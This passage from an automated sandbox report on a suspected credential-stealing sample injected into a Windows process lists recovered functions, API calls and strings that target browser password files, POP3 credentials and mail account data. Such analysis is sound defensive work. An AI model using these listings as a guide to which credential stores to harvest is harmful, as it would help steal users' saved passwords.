                                                                            • Opcode Fuzzy Hash: 0c13a19f140ebb8c22a2bc6978d10b948314cef2adf7705f28c84de1f2e61c89
                                                                            • Instruction Fuzzy Hash: 0C31A9B28056557AFB20EB559C42FDAB3ACDF14315F10419FF21462182EA7CAEC4865D
                                                                            Function 004111AA Relevance: 28.1, APIs: 10, Strings: 6, Instructions: 114COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.2429161201.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_18_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: sprintf$memset$_mbscpy
                                                                            • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                            • API String ID: 3402215030-3842416460
                                                                            • Opcode ID: a1375856f58305cbc92444a301f89f903b2e6d760937f4398232927644d79174
                                                                            • Instruction ID: f20d4583fe87a1bfbd8f178ed5e4bb51106c12545e3cf4f5d6ab8081ed6cb500
                                                                            • Opcode Fuzzy Hash: a1375856f58305cbc92444a301f89f903b2e6d760937f4398232927644d79174
                                                                            • Instruction Fuzzy Hash: 2E4152B2C0115D6AEB21EB54DC42FEA776CEF54308F0401E7B619E2152E278AB988B65
                                                                            Function 0040F0CE Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 192stringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00407B29: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040F0E7,?,?,?,?), ref: 00407B42
                                                                              • Part of subcall function 00407B29: CloseHandle.KERNEL32(00000000,?,?,?), ref: 00407B6E
                                                                              • Part of subcall function 004080D4: free.MSVCRT ref: 004080DB
                                                                              • Part of subcall function 00407035: _mbscpy.MSVCRT(?,?,0040F113,?,?,?,?,?), ref: 0040703A
                                                                              • Part of subcall function 00407035: strrchr.MSVCRT ref: 00407042
                                                                              • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAE3
                                                                              • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAF7
                                                                              • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DB0B
                                                                              • Part of subcall function 0040DAC2: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DBD8
                                                                              • Part of subcall function 0040DAC2: memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DC38
                                                                              • Part of subcall function 0040F036: _mbsicmp.MSVCRT ref: 0040F07F
                                                                            • strlen.MSVCRT ref: 0040F139
                                                                            • strlen.MSVCRT ref: 0040F147
                                                                            • memset.MSVCRT ref: 0040F187
                                                                            • strlen.MSVCRT ref: 0040F196
                                                                            • strlen.MSVCRT ref: 0040F1A4
                                                                            • memset.MSVCRT ref: 0040F1EA
                                                                            • strlen.MSVCRT ref: 0040F1F9
                                                                            • strlen.MSVCRT ref: 0040F207
                                                                            • _strcmpi.MSVCRT ref: 0040F2B2
                                                                            • _mbscpy.MSVCRT(00000004,00000204,?,?,?,?,?,?), ref: 0040F2CD
                                                                            • _mbscpy.MSVCRT(00000004,00000204,?,?,?,?,?,?), ref: 0040F30E
                                                                              • Part of subcall function 004070E3: _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                                              • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.2429161201.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_18_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: strlen$memset$_mbscpy$memcpy$CloseFileHandleSize_mbscat_mbsicmp_strcmpifreestrrchr
                                                                            • String ID: logins.json$none$signons.sqlite$signons.txt
                                                                            • API String ID: 2003275452-3138536805
                                                                            • Opcode ID: ee10521dd79ee73122fc0f876785dd9113831bb39c60f606fe2404f3e43330c8
                                                                            • Instruction ID: 4390ea688f3eb6ff8deec26b973fceccf030c6f24aada76a9830730871e88cce
                                                                            • Opcode Fuzzy Hash: ee10521dd79ee73122fc0f876785dd9113831bb39c60f606fe2404f3e43330c8
                                                                            • Instruction Fuzzy Hash: 5261F671504605AED724EB70CC81BDAB3E8AF14314F1405BFE599E30C1EB78BA89CB99
                                                                            Function 0040C3D0 Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 111stringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • memset.MSVCRT ref: 0040C3F7
                                                                            • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104,?,00000000,00000000), ref: 0040C408
                                                                            • strrchr.MSVCRT ref: 0040C417
                                                                            • _mbscat.MSVCRT ref: 0040C431
                                                                            • _mbscpy.MSVCRT(?,00000000,00000000,.cfg), ref: 0040C465
                                                                            • _mbscpy.MSVCRT(00000000,General,?,00000000,00000000,.cfg), ref: 0040C476
                                                                            • GetWindowPlacement.USER32(?,?), ref: 0040C50C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.2429161201.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_18_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: _mbscpy$FileModuleNamePlacementWindow_mbscatmemsetstrrchr
                                                                            • String ID: .cfg$AddExportHeaderLine$General$MarkOddEvenRows$SaveFilterIndex$ShowGridLines$WinPos
                                                                            • API String ID: 1012775001-1343505058
                                                                            • Opcode ID: 67e53a8000507b2df1606981ac9655a9ff446d7e1ebb268b9dca7550b5d4ed50
                                                                            • Instruction ID: 781a2e52d7f362fd39b5c74be6276a003a473a920a8a4abf0813dd90f66971c0
                                                                            • Opcode Fuzzy Hash: 67e53a8000507b2df1606981ac9655a9ff446d7e1ebb268b9dca7550b5d4ed50
                                                                            • Instruction Fuzzy Hash: F2417E72A01128AFEB21DB54CC85FDAB7BCEB4A300F5440EAF54DA7151DA34AA84CF65
                                                                            Function 00410034 Relevance: 22.8, APIs: 7, Strings: 6, Instructions: 48libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LoadLibraryA.KERNEL32(psapi.dll,?,0040FE19), ref: 00410047
                                                                            • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameA), ref: 00410060
                                                                            • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00410071
                                                                            • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExA), ref: 00410082
                                                                            • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00410093
                                                                            • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 004100A4
                                                                            • FreeLibrary.KERNEL32(00000000), ref: 004100C4
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.2429161201.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_18_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: AddressProc$Library$FreeLoad
                                                                            • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameA$GetModuleFileNameExA$GetModuleInformation$psapi.dll
                                                                            • API String ID: 2449869053-232097475
                                                                            • Opcode ID: ea82c00efb8b675967e90ca7ea1b3b2de08eeb41589313c02842f66110c29472
                                                                            • Instruction ID: dd2e46225b8bbf3860c07ad768741e6abff990e6b314fd3472572f6830733abf
                                                                            • Opcode Fuzzy Hash: ea82c00efb8b675967e90ca7ea1b3b2de08eeb41589313c02842f66110c29472
                                                                            • Instruction Fuzzy Hash: 6E0144399017426AE7226B29BC51B6B3EB89B4DB01B15007BE400E2352DBFCD8C0CF5E
                                                                            Function 00404235 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 100stringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • wcsstr.MSVCRT ref: 0040426A
                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042B1
                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042C5
                                                                            • _mbscpy.MSVCRT(?,?), ref: 004042D5
                                                                            • _mbscpy.MSVCRT(?,?,?,?), ref: 004042E8
                                                                            • strchr.MSVCRT ref: 004042F6
                                                                            • strlen.MSVCRT ref: 0040430A
                                                                            • sprintf.MSVCRT ref: 0040432B
                                                                            • strchr.MSVCRT ref: 0040433C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.2429161201.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_18_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: ByteCharMultiWide_mbscpystrchr$sprintfstrlenwcsstr
                                                                            • String ID: %s@gmail.com$www.google.com
                                                                            • API String ID: 3866421160-4070641962
                                                                            • Opcode ID: 29547c4834dfc2f3f2c875d949c5bc687f91e1fab8962d8e257cc58e07cba8ed
                                                                            • Instruction ID: 1d125d0bf78842d5973e64574db62130ec83037e0b154f7c504db0db8660d96c
                                                                            • Opcode Fuzzy Hash: 29547c4834dfc2f3f2c875d949c5bc687f91e1fab8962d8e257cc58e07cba8ed
                                                                            • Instruction Fuzzy Hash: DA3186B290025DAFEB11DBA1DC81FDAB3BCEB45714F1405A7B718E3180DA38EF448A58
                                                                            Function 0040E381 Relevance: 18.1, APIs: 8, Strings: 4, Instructions: 129COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.2429161201.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_18_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: _strcmpi_strnicmpmemsetsprintf$strlen
                                                                            • String ID: imap://$imap://%s@%s$mailbox://$mailbox://%s@%s
                                                                            • API String ID: 2360744853-2229823034
                                                                            • Opcode ID: fa9f5f1c2ef6f652c20f964ce99d96b8fee6feb6c02ab87e42e45cad748783be
                                                                            • Instruction ID: 1258fd73e7f0479363a75d8e9bd03f7624e4807d7768342ee5bbbb65847b95d7
                                                                            • Opcode Fuzzy Hash: fa9f5f1c2ef6f652c20f964ce99d96b8fee6feb6c02ab87e42e45cad748783be
                                                                            • Instruction Fuzzy Hash: 95418272604605AFE720DAA6CC81F96B3F8EB04314F14497BF95AE7281D738F9548B58
                                                                            Function 004100CC Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 81stringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • strchr.MSVCRT ref: 004100E4
                                                                            • _mbscpy.MSVCRT(?,-00000001), ref: 004100F2
                                                                              • Part of subcall function 0040783C: strlen.MSVCRT ref: 0040784E
                                                                              • Part of subcall function 0040783C: strlen.MSVCRT ref: 00407856
                                                                              • Part of subcall function 0040783C: _memicmp.MSVCRT ref: 00407874
                                                                            • _mbscpy.MSVCRT(?,00000000,00000000,?,00000000,00000104,00000104), ref: 00410142
                                                                            • _mbscat.MSVCRT ref: 0041014D
                                                                            • memset.MSVCRT ref: 00410129
                                                                              • Part of subcall function 0040715B: GetWindowsDirectoryA.KERNEL32(0045AA00,00000104,?,00410182,00000000,?,00000000,00000104,00000104), ref: 00407170
                                                                              • Part of subcall function 0040715B: _mbscpy.MSVCRT(00000000,0045AA00,?,00410182,00000000,?,00000000,00000104,00000104), ref: 00407180
                                                                            • memset.MSVCRT ref: 00410171
                                                                            • memcpy.MSVCRT(?,00000000,00000002,00000000,?,00000000,00000104,00000104), ref: 0041018C
                                                                            • _mbscat.MSVCRT ref: 00410197
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.2429161201.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_18_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: _mbscpy$_mbscatmemsetstrlen$DirectoryWindows_memicmpmemcpystrchr
                                                                            • String ID: \systemroot
                                                                            • API String ID: 912701516-1821301763
                                                                            • Opcode ID: f8a886503ef803f3ee0bfd3d9e760fda2e58d4ed4af484f5670658ee78c777d3
                                                                            • Instruction ID: fda7f57b1b0f7358cef9bf297f3eeb801234e423e358f1bd4862c9dba8460d26
                                                                            • Opcode Fuzzy Hash: f8a886503ef803f3ee0bfd3d9e760fda2e58d4ed4af484f5670658ee78c777d3
                                                                            • Instruction Fuzzy Hash: 3721AA7590C28479F724E2618C83FEA679CDB55704F50405FB2C9A51C1EAECF9C5862A
                                                                            Function 00403166 Relevance: 13.6, APIs: 1, Strings: 8, Instructions: 100stringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00403138: GetPrivateProfileStringA.KERNEL32(00000000,?,0044C52F,?,?,?), ref: 0040315C
                                                                            • strchr.MSVCRT ref: 0040327B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.2429161201.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_18_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: PrivateProfileStringstrchr
                                                                            • String ID: 1$LoginName$PopAccount$PopServer$RealName$ReturnAddress$SavePasswordText$UsesIMAP
                                                                            • API String ID: 1348940319-1729847305
                                                                            • Opcode ID: b5df54f4728cfba1fc6d3682f37c83209c501ebf9394a37894307d593f194734
                                                                            • Instruction ID: 3c3f6fb7771655520bf9db4259302bbcc59fb1a7701990a2e81aa7d88bec6f27
                                                                            • Opcode Fuzzy Hash: b5df54f4728cfba1fc6d3682f37c83209c501ebf9394a37894307d593f194734
                                                                            • Instruction Fuzzy Hash: 6C31A07094024EBEEF119F60CC45FDABF6CAF14319F10806AB59C7A1D1C7B99B948B54
                                                                            Function 00411004 Relevance: 13.6, APIs: 3, Strings: 6, Instructions: 60COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • memcpy.MSVCRT(?,&quot;,00000006,?,?,00000000,0040ABBD,?,?), ref: 00411034
                                                                            • memcpy.MSVCRT(?,&amp;,00000005,?,?,00000000,0040ABBD,?,?), ref: 0041105A
                                                                            • memcpy.MSVCRT(?,&lt;,00000004,?,?,00000000,0040ABBD,?,?), ref: 00411072
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.2429161201.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_18_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: memcpy
                                                                            • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                                            • API String ID: 3510742995-3273207271
                                                                            • Opcode ID: f9ae4bccd643c252e3d2802759cb712313e1c03ba6bda263eb3b4f79a5d554f2
                                                                            • Instruction ID: 550cffa583b2c54ba2aa88b33b5e976ebd7c1d4e5c49a3816a9e471e7c07ee5b
                                                                            • Opcode Fuzzy Hash: f9ae4bccd643c252e3d2802759cb712313e1c03ba6bda263eb3b4f79a5d554f2
                                                                            • Instruction Fuzzy Hash: D501D4B2FC86E428FA3006450C46FE74E4547BFB11F350017F78525AA5A09D0DC7816F
                                                                            Function 0040B38F Relevance: 12.1, APIs: 8, Instructions: 108windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SendMessageA.USER32(?,00001003,00000001,?), ref: 0040B3DC
                                                                            • SendMessageA.USER32(?,00001003,00000000,?), ref: 0040B411
                                                                            • LoadImageA.USER32(00000085,00000000,00000010,00000010,00001000), ref: 0040B446
                                                                            • LoadImageA.USER32(00000086,00000000,00000010,00000010,00001000), ref: 0040B462
                                                                            • GetSysColor.USER32(0000000F), ref: 0040B472
                                                                            • DeleteObject.GDI32(?), ref: 0040B4A6
                                                                            • DeleteObject.GDI32(00000000), ref: 0040B4A9
                                                                            • SendMessageA.USER32(00000000,00001208,00000000,?), ref: 0040B4C7
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.2429161201.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_18_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$DeleteImageLoadObject$Color
                                                                            • String ID:
                                                                            • API String ID: 3642520215-0
                                                                            • Opcode ID: 3f6f34f20c78ecfe39199dd04a8c69320b349886d0faf46357142e58b0488c36
                                                                            • Instruction ID: 78997c319ae04cc2c464f68e1b112159c67c6e7e05dd954700a2b997fe6bb290
                                                                            • Opcode Fuzzy Hash: 3f6f34f20c78ecfe39199dd04a8c69320b349886d0faf46357142e58b0488c36
                                                                            • Instruction Fuzzy Hash: 5A317275680308BFFA715B70DC87FD6B695EB48B00F104828F3857A1E1CAF279909B68
                                                                            Function 004072D6 Relevance: 12.1, APIs: 8, Instructions: 72COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetSystemMetrics.USER32(00000011), ref: 004072E7
                                                                            • GetSystemMetrics.USER32(00000010), ref: 004072ED
                                                                            • GetDC.USER32(00000000), ref: 004072FB
                                                                            • GetDeviceCaps.GDI32(00000000,00000008), ref: 0040730D
                                                                            • GetDeviceCaps.GDI32(004012E4,0000000A), ref: 00407316
                                                                            • ReleaseDC.USER32(00000000,004012E4), ref: 0040731F
                                                                            • GetWindowRect.USER32(004012E4,?), ref: 0040732C
                                                                            • MoveWindow.USER32(004012E4,?,?,?,?,00000001,?,?,?,?,?,?,004012E4,?), ref: 00407371
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.2429161201.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_18_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: CapsDeviceMetricsSystemWindow$MoveRectRelease
                                                                            • String ID:
                                                                            • API String ID: 1999381814-0
                                                                            • Opcode ID: 5011a2be71f5844cc92965472a983066776558f1b2f7244de85e539227eebf35
                                                                            • Instruction ID: 22bb5f5faf33eb927601db2df5736372c6ae1ca5e65390263d5238b88a5d6584
                                                                            • Opcode Fuzzy Hash: 5011a2be71f5844cc92965472a983066776558f1b2f7244de85e539227eebf35
                                                                            • Instruction Fuzzy Hash: C611A536E00219AFDF008FF9DC49BAE7FB9EB44311F040175EE05E3290DA70A8418A90
                                                                            Function 004261F7 Relevance: 10.9, APIs: 2, Strings: 5, Instructions: 443COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.2429161201.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_18_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: memcpymemset
                                                                            • String ID: abort due to ROLLBACK$out of memory$statement aborts at %d: [%s] %s$string or blob too big$unknown error
                                                                            • API String ID: 1297977491-3883738016
                                                                            • Opcode ID: 5be73647a144ebf5748a75f3c436a574a9202e5f864b3081d31fa7a4dfb760c6
                                                                            • Instruction ID: e5ed660087d787d4baabea17299805ba1702756b87ddf288a6169370bd8562d9
                                                                            • Opcode Fuzzy Hash: 5be73647a144ebf5748a75f3c436a574a9202e5f864b3081d31fa7a4dfb760c6
                                                                            • Instruction Fuzzy Hash: FA128D75A00629DFCB14DF68E480AADBBB1BF08314F65409BE945AB341D738F981CF99
                                                                            Function 0041230B Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 187COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.2429161201.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_18_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: __aulldvrm$__aullrem
                                                                            • String ID: -$-x0$0123456789ABCDEF0123456789abcdef
                                                                            • API String ID: 643879872-978417875
                                                                            • Opcode ID: b74aa8b09285f319ac94010cbb77161464d88d468cab547f1369814aecdf9254
                                                                            • Instruction ID: 9a4dcd4671c0eaaf570ced65c0a394ff57d12b60ca94b612a12fd923c93321e5
                                                                            • Opcode Fuzzy Hash: b74aa8b09285f319ac94010cbb77161464d88d468cab547f1369814aecdf9254
                                                                            • Instruction Fuzzy Hash: 09618C315083819FD7218F2886447ABBBE1AFC6704F18495FF8C4D7352D3B8C9998B4A
                                                                            Function 004080ED Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • memset.MSVCRT ref: 0040810E
                                                                              • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
                                                                              • Part of subcall function 0040466B: _mbscpy.MSVCRT(?,Cry,?,004039AA), ref: 004046BA
                                                                              • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                              • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,004082A2,?,000000FD,00000000,00000000,?,00000000,004082A2,?,?,?,?,00000000), ref: 004081A9
                                                                            • LocalFree.KERNEL32(?,?,?,?,?,00000000,7597EB20,?), ref: 004081B9
                                                                              • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                                                                              • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                              • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001), ref: 00406F20
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.2429161201.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_18_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: QueryValue$AddressByteCharFreeLibraryLoadLocalMultiProcWide_mbscpymemcpymemsetstrlen
                                                                            • String ID: POP3_credentials$POP3_host$POP3_name
                                                                            • API String ID: 524865279-2190619648
                                                                            • Opcode ID: b5524387b823faeaa267b2a2291d9d9c6f1165028c5fc642f3f58ff6b69592da
                                                                            • Instruction ID: 3679de1ec208362151a8ef0ee52fb8317fff865e06d3e7d86d66f539d2f4ec3f
                                                                            • Opcode Fuzzy Hash: b5524387b823faeaa267b2a2291d9d9c6f1165028c5fc642f3f58ff6b69592da
                                                                            • Instruction Fuzzy Hash: 5331507594021DAFDB11DB698C81EEEBB7CEF59304F0040BAF904A3141D6349A458F64
                                                                            Function 004073EF Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 53COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.2429161201.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_18_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: _mbscat$memsetsprintf
                                                                            • String ID: %2.2X
                                                                            • API String ID: 125969286-791839006
                                                                            • Opcode ID: 9c39481db8383895c35f041d5bf0f4fe872cf2cabc6c5cb5cd8df66f0331d79d
                                                                            • Instruction ID: 3c8f4d0594b8058611f6c647f75597c7a5b0e751fa8f3ee8557cc8ef3b8c8270
                                                                            • Opcode Fuzzy Hash: 9c39481db8383895c35f041d5bf0f4fe872cf2cabc6c5cb5cd8df66f0331d79d
                                                                            • Instruction Fuzzy Hash: 93017072D0436425F721AA659C43BAA779CDB84705F10407FF844B62C1EABCFA444B9E
                                                                            Function 00444196 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00406D01: CreateFileA.KERNEL32(eBD,80000000,00000001,00000000,00000003,00000000,00000000,004441A1,?,ACD,00444265,?,?,*.oeaccount,ACD,?), ref: 00406D13
                                                                            • GetFileSize.KERNEL32(00000000,00000000,?,00000000,ACD,00444265,?,?,*.oeaccount,ACD,?,00000104), ref: 004441B0
                                                                            • ??2@YAPAXI@Z.MSVCRT(00000002,?), ref: 004441C2
                                                                            • SetFilePointer.KERNEL32(00000000,00000002,00000000,00000000,?), ref: 004441D1
                                                                              • Part of subcall function 00407560: ReadFile.KERNEL32(00000000,?,004441E4,00000000,00000000,?,?,004441E4,?,00000000), ref: 00407577
                                                                              • Part of subcall function 00444059: wcslen.MSVCRT ref: 0044406C
                                                                              • Part of subcall function 00444059: ??2@YAPAXI@Z.MSVCRT(00000001,004441FB,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 00444075
                                                                              • Part of subcall function 00444059: WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
                                                                              • Part of subcall function 00444059: strlen.MSVCRT ref: 004440D1
                                                                              • Part of subcall function 00444059: memcpy.MSVCRT(?,00000000,004441FB), ref: 004440EB
                                                                              • Part of subcall function 00444059: ??3@YAXPAX@Z.MSVCRT(00000000,004441FB,?,00000000), ref: 0044417E
                                                                            • ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000), ref: 004441FC
                                                                            • CloseHandle.KERNEL32(?), ref: 00444206
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.2429161201.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_18_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: File$??2@??3@$ByteCharCloseCreateHandleMultiPointerReadSizeWidememcpystrlenwcslen
                                                                            • String ID: ACD
                                                                            • API String ID: 1886237854-620537770
                                                                            • Opcode ID: 14acd5922900dc7186521c5d2cf315890d497fea2d0f8e510365f992a0e5d2d7
                                                                            • Instruction ID: 993b87d0760cedec04f170bc8e4db420e9372e17061e8bf8474e84fbc22352e0
                                                                            • Opcode Fuzzy Hash: 14acd5922900dc7186521c5d2cf315890d497fea2d0f8e510365f992a0e5d2d7
                                                                            • Instruction Fuzzy Hash: 9201D836401248BEF7106F75AC8ED9B7BACEF96368710812BF854971A1DA359C14CA64
                                                                            Function 004091C1 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 33COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • memset.MSVCRT ref: 004091EC
                                                                            • sprintf.MSVCRT ref: 00409201
                                                                              • Part of subcall function 0040929C: memset.MSVCRT ref: 004092C0
                                                                              • Part of subcall function 0040929C: GetPrivateProfileStringA.KERNEL32(0045A550,0000000A,0044C52F,?,00001000,0045A448), ref: 004092E2
                                                                              • Part of subcall function 0040929C: _mbscpy.MSVCRT(?,?), ref: 004092FC
                                                                            • SetWindowTextA.USER32(?,?), ref: 00409228
                                                                            • EnumChildWindows.USER32(?,Function_00009164,00000000), ref: 00409238
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.2429161201.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_18_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: memset$ChildEnumPrivateProfileStringTextWindowWindows_mbscpysprintf
                                                                            • String ID: caption$dialog_%d
                                                                            • API String ID: 2923679083-4161923789
                                                                            • Opcode ID: 873fb4d128c81b604fb18c2010503b3c06e4abe8b396b72ee5fcb0b2d1fc8e6c
                                                                            • Instruction ID: 6e7d5c99c97eb3a6ca4510ecd50999ddf5df62a663a14868e976e94052726d92
                                                                            • Opcode Fuzzy Hash: 873fb4d128c81b604fb18c2010503b3c06e4abe8b396b72ee5fcb0b2d1fc8e6c
                                                                            • Instruction Fuzzy Hash: ADF09C706442897EFB12DBA0DD06FC57B689708706F0000A6BB48E50D2D6F89D84872E
                                                                            Function 004101AF Relevance: 9.1, APIs: 6, Instructions: 143COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • OpenProcess.KERNEL32(00000410,00000000,00000000,?,?,00000000,?,0040FE66,00000000,?), ref: 004101E6
                                                                            • memset.MSVCRT ref: 00410246
                                                                            • memset.MSVCRT ref: 00410258
                                                                              • Part of subcall function 004100CC: _mbscpy.MSVCRT(?,-00000001), ref: 004100F2
                                                                            • memset.MSVCRT ref: 0041033F
                                                                            • _mbscpy.MSVCRT(?,?,?,00000000,00000118), ref: 00410364
